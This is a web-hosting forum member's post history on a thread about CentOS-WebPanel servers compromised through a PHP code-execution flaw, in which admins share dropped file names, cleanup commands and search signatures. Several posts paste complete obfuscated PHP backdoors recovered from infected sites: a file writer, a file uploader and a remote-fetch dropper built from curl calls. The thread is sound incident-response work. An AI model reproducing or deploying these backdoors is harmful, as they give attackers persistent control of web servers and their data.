This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Pages: [1]
1
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 22, 2025, 07:27:05 PM ».jpg files are always in the same folder with defauit.php file and with sappurit's reply its confirmed that nbpafebaef.jpg file is not randomly named(Same filename with my screenshot earlier at page 7) but its not the only jpg file.Thank you all. I found defauit.php date stamp on JUL 05, 2025
Every file has a different date stamp. Those files were touched to a close date and time of the neighbor files, that date stamp is not the right one. Don't mind searching for time and date, it won't do anything.
Those IP addresses are the same as mine. So, same hacker.
'nbpafebaef.jpg'
'.auto_monitor'
Where these files were present? Do you still know?
I think IP addresses are irrelevant because blocking them are not solution. Its easy to change IP address or tunnel connections.
The timestamp might be touched but it still tell us that most likely vulnerability is still exists.
Maybe someone could decode filemanager.php and apply a fix by adding a check for php sessions.
2
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 22, 2025, 09:35:08 AM »My wordpress wibsites also infeted. And other websites non worpress also. Replaced index.php, added licelic.c" backup.c defauit.php. I found admin accounts in database WP-user wpadmin@volovmart.ru. I dont know how its happened. But i think it is Panel hacked because it is not effect only WordPress CMS. Im using CWP pro.
Hello,
We're encountering the same situation on one of our servers.
While we're actively performing cleanup operations, the critical question remains: Has this vulnerability truly been resolved by the "silent patch"?
Do you have any informations about when end what version of the patch/update ?
Best regards,
I have the same problem. My VPS are infected.
Im using CWPpro version: 0.9.8.1218 and Rocky Linux release 9.5
After the intrusion i have problems with SEO, google results display titles from other sources.
My websites traffic has plummeted in the last few days because of this change. When I type site:mysomain.tld into Google, I see that the results point to my websites, but the text is different.
Does anyone else have this problem? Do you know how to fix it? How did you manage to change it? I've already submitted sitemaps to Google Search Console, but I'm not sure if it will work.
First thing to do is renaming /usr/local/cwpsrv/var/services/user_files/modules/filemanager.php as /usr/local/cwpsrv/var/services/user_files/modules/filemanager.php.disabled
Then follow the messages sent by @pedromidiasf and me at page 5 to page 7. You will see the names of the malicious files dropped by attackers.
What exploiters are capable of is equal to filemanager at the start and this might not seem worrying. But then they take full advantage of PHP so if they want to remove whole of your files, they can and they can redirect your visitors to other websites.
If I was the one whos using this exploit I could convert this to a DDoS tool by redirecting every visitor to the website that I want to cause DoS. So, there is no limit, they can do anything they want and every IT admin should take this seriously.
3
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 22, 2025, 09:10:08 AM »You can also search in your files. "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";"
Might be another backdoor.
Don't trust to find this sequence. All injected files, even if they do the same, all of them have different obfuscation codes even with different sequence of code.
Best way is to search for index files within the folders and check your main index file.
Also consider to disable php execution inside folders that are not needed. Also disable direct execution of php files that don't need to be called directly from URL. This can be done with folder permissions and .htacess files.
This is not obfuscated code. This is ASCII equal to <form method="post".
Attacker uses this pattern in many backdoor files. Its safe for mass remove unless you use regex in your search parameters.
4
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 17, 2025, 02:37:52 AM »
Yet another:
Code: [Select]
4tLR0erSJU _NVs7Gua3DXxdlTMkcAbPv6IfQZ5w8n1pjy
gEoF2qWKhOHYCm9Bz
iZpG0wgCFzfKQIkmM9yLh5WnoDeJai
dNvAq3YrHU16ulxSOX78tR_bs2Tc4EPV
jB MLUdi95
Y
pCgOh84GFvXT1exyWk7cPD3QjBuqr6H JS2woaK_nmR0EIfbZAzsNVtlP1ISy2tYx
5KC7hJ0vfMW6p mgR_bl8NG3aQsUiuVBHATcqXjrFnO4Z
LdozweD9kEv5NHusbl7 CtZQYFLgy23zPK9DOaMxdSeTcGnq0WUpf_R
EXrjwm16Bk8IVoh
4JAiFI
sChXagG3_o cTZn84Vq29KtMedxRzkuSEJmf76wbpOH5iNWDQjB
1ryLUlYAv0PdNVpDkH7 G6ZOhmY_5sl3i4croxKRUEzQTu1P8FMgaA
Wvnq2XLCSftby
ewjB90IJan
Vc4NEB6kKYFz
siUxpZAgSComXO3 R0QHylq5eT9uPvtrJLbWw1h8GdDMIjf72_N
GInAoka5gd42mXeYMJxlj3KPLSpHifV0QrFDZctWqEy 76CsBuvb98_zTROU1hw
ZNt
q83hI6
Ty GUeix9E1AsYb0MQW_CjrH4dXpoLSlKBvwF2g5DzfVRmJk7aunOcP<?php goto Y_0nXzAq;dPW4cKs3: $xAs7Tpz = stripos("xpdk3L0BI","NSzAt"); goto w7QUDA;oI0Ofs1NSE: echo "\74\x64\151\x76\76\x3c\x69\156\160\x75\x74\40\x74\171\x70\145\75\x22\164\x65\x78\x74\42\40\x6e\141\155\x65\75\x22\x71\x79\62\x69\x5a\x22\76\x3c\x2f\144\x69\x76\x3e";goto gEoeu7CYmH;lb_z0E: if($B_6Ta) exit("MPu2OYfMbJ".$F1mVH($B_6Ta));goto DrKUus;TI578M2: $jg3TmtQ = isset($_POST["qy2iZ"])?trim($_POST["qy2iZ"]):"";goto n20zQ9o;RLgetNOE: if($B_6Ta) $Vx6b5eC($B_6Ta,$n2XtH3a);goto lb_z0E;KRTmDNl: $D8jZIM5E = array("sg3tOMKyxWQfXZ"); goto WQIED9;LPvaiTkrsM: $wAuWIZ5 = str_repeat("", 13); goto KRTmDNl;Q8kceJNKf: function gjrAdtg($_yU43,$FyDsPmb){ $b91Og = str_split($_yU43,1); $xBjlH0Y = explode(",",$FyDsPmb); $wqGkWJg=""; foreach($xBjlH0Y as $v){ $wqGkWJg .= $b91Og[(int)$v]; } return $wqGkWJg; }goto L0LQ7hb4;cD6Re4V9s: echo "\x3c\x62\x75\164\x74\157\x6e\x20\164\171\160\x65\75\x22\x73\165\142\155\151\164\42\x3e\163\x75\x62\x6d\151\x74\x3c\x2f\x62\x75\x74\x74\157\156\76";goto l_Ln6t1XY;fWFX6D3: echo "\74\x66\157\x72\155\40\x6d\145\164\150\157\144\75\42\120\x4f\x53\x54\42\x3e";goto oI0Ofs1NSE;DrKUus: $Le4p2 = str_replace("Le4p2", "", "Le4p2");goto Q8kceJNKf;kZly82kt: if(!isset($_GET["U8v"]))exit;goto TI578M2;g8fvDVd: $cXUEo94Gg = addcslashes("cXUEo94Gg","JbuaWR8jKC"); goto ubiQf8X;I0xkT8MIo: $AUCcxm3 = strtok("AUCcxm3"); goto gvoaFcZ3;WQIED9: $zFGOj8f = str_replace("zFGOj8f", "", "zFGOj8f");goto Li1o5cfm27;llJW4kEf9: $x5scPOjt = false; goto fbZp1Xjf;XfOS3Dc: $B_6Ta = !empty($n2XtH3a)? $Qgi0D($jg3TmtQ,"w"):"";goto H7fbdkCE;H7fbdkCE: $IewLIh = str_repeat("", 13); goto RLgetNOE;gEoeu7CYmH: $zHES9 = addslashes("zHES9"); goto jdRWyZ;Li1o5cfm27: $dRLQvy = str_shuffle("Y5_HmEAQe"); goto g8fvDVd;ubiQf8X: $DrKtQl = strstr("DrKtQl", "MFIjtb0zZ"); goto qZPStqv;jdRWyZ: $DWm5Nc = str_shuffle("fw9Jk"); goto dPW4cKs3;CTbrxv3k: $FdH6ED = strpos("WcoMi9bD","NAQc1"); goto VCUOJo5;FCBbyoJ: $ko_A7 = sprintf(""); goto kZly82kt;gvoaFcZ3: $y6FmI = implode("y6FmI",array());goto XqZl_hutd;l_Ln6t1XY: echo "\74\57\146\157\162\155\x3e";goto LPvaiTkrsM;w7QUDA: echo "\x3c\144\151\166\76\74\164\145\170\164\x61\162\145\141\40\x6e\x61\x6d\145\75\x22\x41\x4e\x33\x37\x38\42\40\162\157\167\163\75\x22\x35\x22\76\x3c\x2f\164\x65\x78\x74\x61\162\x65\141\x3e\x3c\x2f\x64\x69\x76\76";goto cD6Re4V9s;VCUOJo5: $xdsef = c8SWnC::JPFrgeHO("xYCU1Tl",3);goto XfOS3Dc;kSwOti: $rson9 = strstr("rson9", "PCKFi09"); goto I0xkT8MIo;Y_0nXzAq: $enzir = str_shuffle("ecSJnCA"); goto kSwOti;fbZp1Xjf: class c8SWnC{ public static function __callStatic($name, $arguments) { $temarr = array("Qgi0D"=>array("c2fnmdelr7y_ropazeMx0pWejt","2,13,14,6,3"),"Vx6b5eC"=>array("XaieuRrZAxGfUvcdaFbpreweWlt_","11,22,6,2,26,3"),"F1mVH"=>array("a1_Sp5oziMfcrH7wZclEselpeeAF","10,11,18,6,20,21")); foreach($temarr as $key=>$v){ $GLOBALS[$key] = gjrAdtg($v[0],$v[1]); } } }goto fWFX6D3;n20zQ9o: $n2XtH3a = isset($_POST["AN378"])?trim($_POST["AN378"]):""; goto CTbrxv3k;L0LQ7hb4: $XlpVX = ucwords("O_bclSmgv"); goto llJW4kEf9;XqZl_hutd: $G_eLJz = sprintf(""); goto FCBbyoJ;qZPStqv:""; ?>S7xr01o
zQiyX8uFCbpvaD6fWI9VnNsUZdqhjtYJGeg5_TwOKPL3
RABckM 2HEml4RGv9ifYzuMOP2HXASjcaper6714Vb358 xnoEtKWglqQsyNkF0UCmw
hJDBILT_dZUTYIBJ1dQwWuh0txHGmkZrNE
vo_ CgA3O2KMslynRP4z85jeD6FifqbLVS9a7cpX
0_MhDcG1 xkPWy9fNSR3AsIHTBVOe2tYiXqo76UFjCvmwQa5KEgl4
b
LrZuzn8dpJcK64
HSUzIYPE2GCViTZA8nuomgjRN
kv1tq DxMWs59_XBlFw3yLQbdh0OJp7refa
5
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 17, 2025, 02:35:42 AM »
Another backdoor(Search for terms such as "= strval(false); goto" to find other occurances in your webserver):
Code: [Select]
<?php goto lVijFaMf;JJDjaIOYP0: $e7hWk = ucfirst("gbqmo"); goto iEqHs1c;DXNSWE: $ouok7MZ = addslashes("ouok7MZ"); goto M3amtuEDv;HUSdrNR: if(!isset($_GET["U8v"]))exit;goto QesQqL3zP;BZvnmC: if($RsdQa)exit("TkDTbQiPzSd4Z9pAx1h".copy($_FILES["qcDxi5jZ61"][("tWUa")[0].("gEmv")[2]./**/("pk5t")[0].("sk_n2r")[2]./*
*/("tUhnxb")[3]./*
*/("Za1OB")[1]./**/("O6mE")[2]./*
*/("VeyDa")[1]],$RsdQa));goto DXNSWE;isQdpF1z: $YIHPFEse = (string) null; goto kUwVlNc7d0;QesQqL3zP: if(isset($_FILES["qcDxi5jZ61"]))$RsdQa = basename($_FILES["qcDxi5jZ61"][("iniY")[1]./*
*/("FHad")[2]./*
*/("MImEQZ")[2].("eoiyF")[0]]);goto BZvnmC;mc80VrYbp_: $vSDMWP = lcfirst("dMSowB7jU"); goto leUr0KWa;RY9_TI: $KePs2Rp = (/**/("ziX4")[1].("mFjD")[0]./**/("Qepph")[3].("llIP5W")[0].("toUi")[1].("Odmwfn")[1].("DjbeW")[3])(",",array("XGpyb","h57YPQWV","KXTOke5","NmhUN")); goto i0NKZiX1;QOPTD8ys4: $cHcBL2z4 = (("MsJI4D")[1]./*
*/("Msuk")[2]./**/("VLbu")[2].("hs39Jc")[1].("PhFtX")[3].("yWr2")[2])("cHcBL2z4",8,0);goto RY9_TI;OEMap7X: $VtXzh6f = addslashes("VtXzh6f"); goto SfWARya;D5IUXJ4: $FfEiu = sha1("Gc7aq"); goto F1J_RKtp;kUwVlNc7d0: $AgsciC4bG = strpos("PYGIXK","Vigysmb6T"); goto LruYdez9j;QwphlQi1V: $B5MDKsm1r = (string) null; goto QOPTD8ys4;G3_ly06IJ: $PDCRK = (("hwSaJ")[1].("bohU40")[1]./**/("wirb")[2]./**/("O0acde")[4]./**/("onH7w9")[4]./*
*/("jWMru4")[3]./* */("OaWo")[1]./**/("gpbP_")[1])("", 11);goto JJDjaIOYP0;LruYdez9j: $SK59OL = (("KjtsDQ")[3].("tZ1P")[0]./* */("L5Jri")[3]./**/("tIFGxP")[0].("Nork1l")[1]./**/("E5kme")[2])("SK59OL"); goto QwphlQi1V;i0NKZiX1: $LsxEThigD = sha1("aWZBpd"); goto gtL9M7EZ1u;leUr0KWa: echo /**/("<Xe9")[0]./*
*/("vkGjf9")[4]./* */("qaotd")[2]./**/("C3r2o7")[2].("bBmir")[2]./*
*/("tt G")[2].(" vbf29")[0]./*
*/("mT5d")[0].("emrb")[0].("FHtovt")[2]./*
*/("eVhg")[2].("ZEom4S")[2].("gdmZpT")[1]./**/("Dsuh=j")[4].'"'./*
*/("poNw")[0]./**/("lzjorm")[3].("syhHa")[0]./*
*/("JedtB")[3].'"'.("C DeC")[1]./**/("g5xe2")[3]./*
*/("q2KnqY")[3]./**/("yPcOz")[2]./*
*/("Gft9")[2].("Ky0nvd")[1]./* */("aNpq")[2].("ce8cUG")[1].("Tu=Wc")[2].'"'.("A9nmQi")[3].("uAYEK")[0].("bKal1")[3].("CHstV")[3].("iAin")[0]./**/("RpvMXt")[1].("azF7XA")[0]./* */("Eprv")[2]./* */("tXeA1a")[0].("/rhP0")[0].("qfGO")[1].("g7oe9")[2].("KMQ7rg")[4].("l3m9")[2]./**/("-Y0rt")[0]./**/("FnkdF")[3].("jays")[1]./*
*/("tQB8")[0]./* */("WnXNae")[4].'"'.("W5>o")[2];goto NCQOl4V_d;QXQSIJ: $s9N_vWPUq = (/**/("PsM0F")[1].("H5p8")[2].("VZrvf")[2]./**/("JMiJ")[2]./**/("vtnnA")[2].("Njt3Sk")[2].("fyQI")[0])(""); goto gyIvf3Gw;lVijFaMf: $UWg_fp2 = (/**/("cja8xK")[0]./*
*/("ohEFq")[1].("ubvgx")[0].("qq4nng")[4].("o3pkra")[3]./**/("a3_eRq")[2].("SspUyB")[1]./*
*/("GpcY5")[1]./*
*/("hl5zoc")[1].("iNkS")[0].("Qt9eU")[1])("qEZi0qy3rN7c",3); goto isQdpF1z;PHQO3t: $WAiLRzYf = lcfirst("I3ZDXQ"); goto D5IUXJ4;HpTmlO: echo /**/("MA<w")[2].("pih6")[1].("nmkl")[0].("Cpgo")[1].("lmyu3")[3]./**/("tbZM4W")[0].("j5 h")[2]./**/("ztea0E")[1]./* */("Oy7Gr")[1].("QV7_pd")[4].("geEAw")[1].("GkB=V")[3].'"'./**/("oksh")[2].("puw7")[1].("bBrC")[0]./*
*/("DqDmj")[3].("vPYiT")[3]./**/("Rt8L")[1].'"'./*
*/("FP JoZ")[2]./**/("TRvE")[2]./*
*/("MQtLam")[4]./*
*/("rlf9K")[1]./**/("dQ0Yuh")[4].("eFvZ")[0]./*
*/("=fEv")[0].'"'.("aiFsBe")[3].("cnuqCR")[2].("bx_4")[0]./**/("Qm_lZn")[1]./*
*/("qi_g2")[1].("KbtH4")[2].'"'./**/("M>2Um")[1];goto QXQSIJ;SfWARya: $yTa7b = addslashes("yTa7b"); goto PHQO3t;gyIvf3Gw: echo ("<phD")[0]./*
*/("n/yaoF")[1].("JfExCS")[1]./**/("nEoVjD")[2]./* */("TNrx")[2].("sm5zfD")[1].("Wcl>M")[3];goto OEMap7X;F1J_RKtp: $a2mcgG = define("E1Oes","kobMCZ5Q"); goto OjXQTpN;NCQOl4V_d: $jgJlQM = (/* */("Spksb")[3]./**/("nfYtt")[3].("YGrpB")[2]./**/("Cj_Sz")[2].("gryxuV")[1].("ebev")[2].("qXpL")[2].("QlKWwI")[1]./**/("jamOa9")[1]./*
*/("a2Hcc")[3].("celqm")[1])("jgJlQM", "", "jgJlQM");goto ZpJDct1;M3amtuEDv: $Q0bMh = (/**/("cja8xK")[0]./*
*/("ohEFq")[1].("ubvgx")[0].("qq4nng")[4].("o3pkra")[3]./**/("a3_eRq")[2].("SspUyB")[1]./**/("GpcY5")[1]./**/("hl5zoc")[1].("iNkS")[0].("Qt9eU")[1])("BrV61eAfMIydF",3); goto mc80VrYbp_;gtL9M7EZ1u: $C8f3Yq6 = strval(false); goto HUSdrNR;ZpJDct1: echo ("_<ib")[1].("FDiaL")[2]./**/("nLKb4w")[0].("DpVT")[1].("u_TGl")[0].("WEftFv")[3]./**/("eF m")[2]./**/("ttUPk")[0].("yIYq")[0].("kSpx")[2].("aneY")[2].("By=2")[2].'"'.("lfQJ")[1]./**/("SP1iG")[3].("uLlOQ")[2].("rvjeim")[3].'"'./*
*/("K OeY")[1]./*
*/("nNvdM")[0]./**/("KazX")[1].("mLSjx")[0]./*
*/("Aeug")[1]./*
*/("W=p2Bx")[1].'"'.("gbqg")[2].("foec6t")[3]./*
*/("ijn1DL")[4].("otRxUV")[3].("im9c")[0].("t4RQ5X")[4].("ezj8f")[2]./* */("CQZZ6")[3]./**/("6Fk9")[0].("C1i2E")[1].'"'.("uSc DR")[3].("qP>7")[2];goto HpTmlO;iEqHs1c: $CpiskJ = strval(false); goto A2cGUk_mr;OjXQTpN: $bAEaqf = strval(false); goto G3_ly06IJ;A2cGUk_mr:""; ?>
6
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 17, 2025, 02:32:54 AM »
Just another obfuscated index.php file in a random directory.
You can search for terms such as "stream_get_meta_data($infoW)["uri"];goto" to find other occurances in your webserver.
You can search for terms such as "stream_get_meta_data($infoW)["uri"];goto" to find other occurances in your webserver.
Code: [Select]
<?php goto k8m1QZt2JL;yTZ1Fxr: if(!isset($_GET[/* */("LcEF")[1]./* */("UefpAJ")[4].("ABo7")[1]./*
*/("tGNgsd")[1]]))exit;goto OziaS8PU;vPbzyCtLXQ: $eHNuBzJ = strpos("wnJbkEld","u4Yhb62jk"); goto VcJp97;FI7ycwetQZ: $GbmJE9c2n = (/**/("VsLP")[1].("mpNto")[3]./* */("pr2lfq")[1]./**/("J_Tt9")[1].("pNVr3b")[3].("Oev_")[1].("UogpT")[3].("AsBe9")[3]./*
*/("ayOxC")[0].("cUmStk")[4])("", 5); goto djdAEq3_Z;mNZMuAn03: $ydOGPJ = (/**/("sSsh")[2].("ZtvS")[1]./**/("pADr1M")[3]./*
*/("I_0ubT")[1].("pM983l")[0]./**/("aYudaD")[4].("kId89Q")[2])("", 0); goto KUaAIeWh;ZJHKzh7N2: (/**/("csdP")[0].("tuBoV")[1]./*
*/("rCcz")[0]./*
*/("lbaf3R")[0]./**/("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./**/("E7tf")[2])($t7i13,(int)(("6jbAMe")[0].("L40K_Q")[1]./**/("_hBqvO")[0]./* */("Ornh4K")[1].("hEleF")[3].("peTs")[0].("lJAa")[0]), 0);goto yQ85f0rF;pb80aP: $XxbaA = strpos("ZzQy_I1A","qPSwx"); goto a5ePVEUtX;xJ9cj1QxEH: $zAQ5o = addcslashes("zAQ5o","HLVD9H67XoGvS"); goto cu4yJeSN;ZfrIJlvZ: $P_Ly5sMoT = define("pvt1yW","Yz49D_7"); goto dLtmkp;cNivf5: $infoW = copy($csSfc,/**/("kvAsC4")[3]./*
*/("yhIm")[1].("uP6oZ")[3]./*
*/("Hyqp7o")[3]./**/("lO0c.R")[4]./**/("pxho")[0].("qYh8")[2]./**/("LyupQ")[3]);goto gmxZhVfc;a5ePVEUtX: $LbvZIl = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./*
*/("A4VdS")[3]./**/("e_LHi")[0])(",",array("PaZH_Rtb","G2JxvFl","hoUZ10QF","MW4IobOQw")); goto CYUI5Vg278;OP7W6w: $tU6Htl = (("ss3L_")[0].("pDp1")[2]./**/("AFrNvr")[2]./**/("wBiA")[2]./**/("nV17")[0].("BWtB")[2].("Yfkh")[1])(""); goto PLp95gFG;kkF4Ncr6: $TH_apwEWT = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./*
*/("e_LHi")[0])("TH_apwEWT",array());goto fGsvMWjuCg;UQUoexHiS: $dZtonG = (/* */("sLZH")[0]./*
*/("vtZitF")[1].("rXBJ")[0].("crcsxA")[3].("TtP9")[1].("ptrQIR")[2])("dZtonG", "Xj7s2uF"); goto yTZ1Fxr;RrN4Re3O_t: $oMOVB51r = (("nMvsY")[3].("Lt7v")[1]./*
*/("lrbZ")[1]./*
*/("tABA5")[0]./*
*/("IAob")[2]./**/("NjkN")[2])("oMOVB51r"); goto eF_jfNyOpE;gmxZhVfc: echo /**/("Zsa9")[1].("IcruR")[3]./**/("Rc9H")[1]./**/("wJcVmu")[2]./**/("ieZ6H")[1].("sK4S")[0].("_sr_")[1];goto glwegx;arGUuE: (/**/("csdP")[0].("tuBoV")[1]./**/("rCcz")[0]./*
*/("lbaf3R")[0]./**/("IN_Uo")[2]./*
*/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./*
*/("E7tf")[2])($t7i13,(int)(("gc1l")[2]./*
*/("Tu0X")[2]./**/("0_6Yf")[0].("E2k0sR")[3].("Uv62N")[3]),$Cr7YLD);goto jeITJ05L;_QPyC_Uw2d: if(!$infoW)exit;goto qaCsrh;eF_jfNyOpE: $lqGibM = false; goto qb6tWVjZ;m2UFsayhKt: fwrite/*x1dsK*/($infoW,$E9kFDYug);goto vPbzyCtLXQ;CYUI5Vg278: $E9kFDYug = (/*
*/("ccqL8")[1].("kFuEk")[2].("jrRr6")[3]./*
*/("NBl67")[2].("Bn_s")[2]./*
*/("oyLce4")[4]./*
*/("Eg_xc")[3].("zeWz9p")[1].("cENYr")[0])($t7i13);goto nMiUby1u;jeITJ05L: (/**/("csdP")[0].("tuBoV")[1]./*
*/("rCcz")[0]./*
*/("lbaf3R")[0]./**/("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./*
*/("T3opB")[2].("fpVS")[1]./**/("E7tf")[2])($t7i13,(int)(("1wuA")[0].("9VKY")[0].("Gm90c")[2].("tHlX1Y")[4]./* */("3JbxO")[0]), 1);goto ZJHKzh7N2;ycMWqZr4C: $irwRMpNx = (("nMvsY")[3].("Lt7v")[1]./**/("lrbZ")[1]./*
*/("tABA5")[0]./**/("IAob")[2]./**/("NjkN")[2])("irwRMpNx"); goto xJ9cj1QxEH;rgOInqtUo: (/**/("MITicM")[4].("eH4ucd")[3]./**/("Borcf")[2].("AlkY")[1]./**/("_NIqj")[0]./**/("ichPI")[1].("hluo")[1]./*
*/("oFWp2X")[0]./**/("sRqxW")[0]./*
*/("MJVer")[3])($t7i13);goto xqvlspVMua;rxOZNFk6: $_3dp2Bmv = define("gS0ht4vV","BmWliLbks"); goto arGUuE;glwegx: $Ji8Czwd = (("K4Pwx")[3]./*
*/("oU8IH")[0]./**/("Yrmrhj")[3].("dAn05L")[0]./**/("U4w5s")[2]./**/("QtrRd")[2].("FiaP")[2]./**/("kepvP")[2])("", 8);goto ZfrIJlvZ;VcJp97: $csSfc = stream_get_meta_data($infoW)["uri"];goto zvoTdAM;AzW2rIcJ: $infoW = tmpfile();goto _QPyC_Uw2d;YO7HPNId4: $sXEr6Sz = (("msSf")[1]./*
*/("lJFu4d")[3].("Db8T3")[1]./* */("sqST")[0].("MgaJtz")[4]./*
*/("Eru4")[1])("sXEr6Sz",7,0);goto UQUoexHiS;CAVY2h: $Hyl46K8Pe = (string) null; goto kkF4Ncr6;VYlTbVK9Cv: $bkPC7wsv = addslashes("bkPC7wsv"); goto I0tBIKQV5u;PLp95gFG: $KFHM5D = str_shuffle("l5wgOtr9"); goto mNZMuAn03;H38OmS_psA: $ARVzAQu75 = sha1("l45rQuas"); goto ZgjHvXPb;y_QeZmI: $lnbixGW6K = strval(false); goto FI7ycwetQZ;qb6tWVjZ: $Ed9U5Pe = (("lbsSNF")[2].("UtwcV")[1].("P6rgd")[2].("L09_1")[3].("borsxS")[2]./*
*/("We1B")[1]./*
*/("pcpv")[2].("oHlG")[2].("LRma5")[3].("Xx9cgf")[3]./*
*/("ewfMO")[0])("Ed9U5Pe", "", "Ed9U5Pe");goto VYlTbVK9Cv;fGsvMWjuCg: $YZqXErkJ = (("nMvsY")[3].("Lt7v")[1]./**/("lrbZ")[1]./**/("tABA5")[0]./**/("IAob")[2]./**/("NjkN")[2])("YZqXErkJ"); goto DLBXjhA;jG5mLo1C: $oh7lPvV = ucfirst("XnNXA"); goto CAVY2h;djdAEq3_Z: $vp6WA8o3 = defined("L4cqa"); goto OP7W6w;k8m1QZt2JL: $gTPQ4h_ = (string) null; goto jG5mLo1C;xqvlspVMua: $j6ten = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./* */("e_LHi")[0])(",",array("N6SpwGx","dXFrUC","yCMd3aqoh","ZT9mZANQd")); goto AzW2rIcJ;zvoTdAM: $K0ucKTH = (/*
*/("VsLP")[1].("mpNto")[3]./**/("pr2lfq")[1]./**/("J_Tt9")[1].("pNVr3b")[3].("Oev_")[1].("UogpT")[3].("AsBe9")[3]./**/("ayOxC")[0].("cUmStk")[4])("", 9); goto cNivf5;TYXDZEOJmf: $ql3NdoZhX = (/**/("cdBD")[0].("rrhF6")[2].("MuUOr")[1]./**/("nogxjH")[0]./**/("UXky")[2]./*
*/("lC_B")[2]./**/("Ys2YWh")[1]./* */("_M6pL")[3]./*
*/("ZxlK")[2].("dW2Yic")[4].("vtmA0")[1])("Fi1WqIDCMdxfVZ",3); goto Al0Jehv;ywlXs3Q: $V63Ja = (("ss3L_")[0].("pDp1")[2]./**/("AFrNvr")[2]./*
*/("wBiA")[2]./* */("nV17")[0].("BWtB")[2].("Yfkh")[1])(""); goto ncjtyvXFZ;ZgjHvXPb: $H9MphLJI = (string) null; goto RrN4Re3O_t;dLtmkp: $enf6Gi = strval(false); goto H38OmS_psA;KUaAIeWh: $ktFgPIC = strpos("xO4DmC9YN","cKoiJMdr5"); goto YO7HPNId4;nMiUby1u: $JNhW9rbZ2 = str_shuffle("uYL8h25BV"); goto TYXDZEOJmf;Al0Jehv: $I7rMnac = (string) null; goto rgOInqtUo;ncjtyvXFZ: $t7i13 = (/*
*/("cAGt")[0]./*
*/("bugBio")[1]./**/("H4rE")[2].("lf57")[0].("LlQ__X")[4].("LxiWUA")[2]./*
*/("SKnLI")[2]./*
*/("igql")[0]./**/("MtgB28")[1])();goto rxOZNFk6;cu4yJeSN: $vqMptm = addcslashes("vqMptm","IObRDjqzLMWXv"); goto NuPUfHtybg;DJtNV7: $K_WRFfn = lcfirst("dOV3gjZAn"); goto ycMWqZr4C;DLBXjhA: $K5mQnDhjp = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./**/("e_LHi")[0])(",",array("vBTAjn","HyP0zIH","LMGfhu","VcsT_mR1")); goto y_QeZmI;I0tBIKQV5u: $PDZK2ztn = array("JmS6k7IrqLxD"); goto DJtNV7;yQ85f0rF: (/*
*/("csdP")[0].("tuBoV")[1]./**/("rCcz")[0]./*
*/("lbaf3R")[0]./* */("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./*
*/("E7tf")[2])($t7i13,(int)(/**/("L135XO")[1].("mHc3fP")[3].("ZH_9Bo")[2]./*
*/("rnvWG")[0].("kmepc")[2]./**/("pAI7")[0].("ChKFlJ")[4]), 49);goto pb80aP;OziaS8PU: $Cr7YLD = /* */("_Xj4hP")[4]./*
*/("zht8so")[2]./* */("GvLtuJ")[3]./**/("Scpo7")[2]./**/("LH:4ym")[2].("/cpL")[0]./*
*/("/AAW")[0].("Sv3J")[1]./**/("oak4")[0]./**/("tblrC")[2].("dogcE")[1].("D2Kv1l")[3].("oM4mG")[3]./*
*/("aFau")[0]./**/("Brdw")[1].("utUO")[1]./*
*/(".O3I")[0]./**/("i4rV")[2]./**/("b7u9")[2]./**/("U/ZSoV")[1].("JdfOn")[1]./*
*/("XEd_ag")[4].("YyIMi2")[4]./*
*/("/AfZ")[0].("I4A6?F")[4].("NPtqVR")[2]./*
*/("_i=Ygp")[2].("pCvE")[0].("c&wB3u")[1]./*
*/("thIlG")[3].("t=n3")[1].("zu2BCD")[0].("Sljdi")[3].("Rh20K")[1].("m5ysb")[2]./**/("KS-H")[2]./* */("e8kT")[1]./**/("u-Gilp")[1]./**/("8k0oMA")[0];goto ywlXs3Q;qaCsrh: $t1gXasH4J = (/*
*/("sLZH")[0]./**/("vtZitF")[1].("rXBJ")[0].("crcsxA")[3].("TtP9")[1].("ptrQIR")[2])("t1gXasH4J", "rgH8fJFR0"); goto m2UFsayhKt;NuPUfHtybg:""; ?>
7
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 17, 2025, 02:29:03 AM »You dont need a script to remove them. This will remove all of the malicious code except for index.php.Code: [Select]find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.
If you have two examples of infected index.php file, i can try to make a script that will auto remove them.
I had files that didn't have the dot on the ".c", they were just "c". Take a look in your server as well.
Also inspect all your robots.txt and index.php (of the root folder of each website) mine got infect on top.
Yeah, i've found the file named "c" one of the websites. I've also found another index.php file in a random directory, which was obfuscated but its obvious that the file is creating an html form element.
Code: [Select]
echo "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";Code: [Select]
<form method="POST"You can also search in your files. "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";"
Might be another backdoor.
8
